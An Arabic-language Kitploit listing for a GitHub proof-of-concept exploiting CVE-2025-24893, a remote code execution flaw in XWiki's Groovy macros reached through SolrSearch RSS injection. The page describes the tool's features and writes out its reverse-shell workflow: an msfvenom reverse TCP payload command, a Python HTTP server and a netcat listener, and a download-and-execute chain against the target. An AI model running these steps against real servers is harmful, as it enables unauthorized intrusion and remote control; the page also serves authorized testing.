Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-24893 — يستغل الـ PoC الثغرة CVE-2025-24893، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) في XWiki سببها عزل (sandboxing) غير سليم في وحدات ماكرو Groovy المعروضة بشكل غير متزامن. تسمح بتنفيذ أوامر عشوائية عبر الحقن في نقاط نهاية SolrSearch المعتمدة على RSS. | Kitploit
أدوات/GitHubGitHub/infinit3i/cve-2025-24893
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالشيل كوداستغلال تطبيقات الويبالقيادة والسيطرة
GitHubinfinit3i/cve-2025-24893

CVE-2025-24893

يستغل الـ PoC الثغرة CVE-2025-24893، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) في XWiki سببها عزل (sandboxing) غير سليم في وحدات ماكرو Groovy المعروضة بشكل غير متزامن. تسمح بتنفيذ أوامر عشوائية عبر الحقن في نقاط نهاية SolrSearch المعتمدة على RSS.

عرض المستودع
612منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
الموقع الإلكتروني
مشاركة

إثبات المفهوم لـ XWiki CVE-2025-24893

المؤلفون: Net.Doge و Infinit3i


صورة CVE-2025-24893



Twitter Follow


هذا السكربت المكتوب بلغة Python يستغل CVE-2025-24893، وهي ثغرة تنفيذ أكواد عن بُعد (RCE) في XWiki ناتجة عن عزل غير صحيح في وحدات الماكرو الخاصة بـ Groovy والتي تُعرض بشكل غير متزامن. وهي تسمح بتنفيذ أوامر عشوائية من خلال الحقن في نقاط نهاية SolrSearch المعتمدة على RSS.

📌 الميزات

  • تنفيذ أمر واحد عبر حقن Groovy
  • توليد تلقائي لحمولة صدفة عكسية (باستخدام msfvenom)
  • خيار لتخصيص:
    • الهدف البعيد
    • عنوان IP المحلي
    • منفذ خادم HTTP
    • منفذ beacon للصدفة العكسية
  • معاينات نظيفة لحمولات bash
  • واجهة TUI تفاعلية ملوّنة بـ ANSI

🚀 الاستخدام

  1. استنسخ السكربت أو نزّله.

  2. تأكد من تثبيت ما يلي:

    • msfvenom من Metasploit
    • Python 3
    • jq (يُستخدم في حمولات bash)
  3. شغّل السكربت:

root@kitploit:~
python3 CVE-2025-24893-PoC.py
  1. اختر من القائمة:

    • تشغيل أمر – تنفيذ أي أمر شل عن بُعد.
    • صدفة عكسية – توليد ونشر صدفة عكسية بصيغة ELF إلى الهدف.
    • تغيير الإعدادات – تعديل LHOST أو RHOST أو منفذ الخادم أو منفذ beacon.

🧪 سير عمل الصدفة العكسية

  1. يتم توليد الحمولة:
root@kitploit:~
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<your_ip> LPORT=<beacon_port> -f elf -o rev
  1. سيُطلب منك تشغيل خادم HTTP بـ Python ومستمع netcat:
root@kitploit:~
python3 -m http.server 8080
nc -lvnp 31337
  1. يرسل السكربت التسلسل التالي إلى الهدف:

    • تنزيل الحمولة
    • جعلها قابلة للتنفيذ
    • تنفيذ الملف الثنائي

⚠️ إخلاء المسؤولية

هذه الأداة مخصصة لأغراض تعليمية وللاختبار المصرح به فقط. الاستخدام غير المصرح به ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها هو أمر غير قانوني وغير أخلاقي.

📄 المراجع

  • XWiki
  • MITRE CVE-2025-24893
تنزيل الأداة